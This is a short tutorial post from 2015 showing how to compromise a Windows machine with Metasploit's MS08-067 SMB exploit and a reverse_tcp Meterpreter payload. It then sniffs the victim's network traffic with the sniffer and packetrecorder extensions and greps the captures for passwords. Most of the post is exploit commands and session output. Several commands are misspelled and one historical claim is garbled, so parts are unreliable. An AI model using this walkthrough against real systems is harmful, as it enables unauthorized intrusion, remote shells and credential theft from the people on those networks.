Ready to Start Your Career?

Tutorial: Packet Sniffing

Multi Thinker's profile image

By: Multi Thinker

July 14, 2015

Packet sniffing was never easy before. In the late 90's, we used tunneling, wire Shark, MITM and SSL Striping.After a payload of reverse_tcp in meterpreter, all we need is to use exploit "sniff"I assume you have msfconsole opened and configured.Let's begin...Location and using Windows SMB exploit:msf > use exploit/windows/smb/ms08_067_netapi Setting payload of reverse_tcp:msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpeter/reverse_tcpSetting local host for ping backs:msf exploit(ms08_067_netapi) > set LHOST x.x.x.xSetting target host:msf exploit(ms08_067_netapi) > set RHOST x.x.x.xAnd then fire:msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST[*] Started reverse handler[*] Triggering the vulnerability...[*] Transmitting intermediate stager for over-sized stage...(216 bytes)[*] Sending stage (205824 bytes)[*] Meterpreter session 1 opened (x.x.x.x:4444 -> x.x.x.x:1921)
Yes! We got our target under control.So now what? Just use sniffer.meterpreter > use snifferLoading extension sniffer...success.We can even see the sniffer option by pressing sniffer help. Let's start the sniffer:
eterpreter > sniffer_start 1[*] Capture started on interface 1 (200000 packet buffer)
 Here we go...
meterpreter > sniffer_dump 1 /tmp/all.cap[*] Dumping packets from interface 1...[*] Wrote 19 packets to PCAP file /tmp/all.capmeterpreter > sniffer_dump 1 /tmp/all.cap[*] Dumping packets from interface 1...[*] Wrote 92 packets to PCAP file /tmp/all.cap
Success! We can cat and open this .cap file with winPcap and there's one more method for sniffing calledpacketRecorder in meterpreter (same as the sniffer). Just type:meterpreter > use packerrocerderYou can see the options in the help section. All you need is to give him a path for our records.Before starting sniffing, we need to choose what the network interface should be for it.
meterpreter > run packetrecorder -li
 After that, you're ready to fire...!
meterpreter > run packetrecorder -i 2 -l /root/[*] Starting Packet capture on interface 2[+] Packet capture started[*] Packets being saved in to /root/logs/packetrecorder/....
 Again. we can use wireShark or winPcap to see our packets.Here, for wireshark, just locate your file and type this command:
tshark -r recordfilename.cap |grep PASSPASS : thisissecretPASS : thisiscaptured
 -- Mutli Thinker
Schedule Demo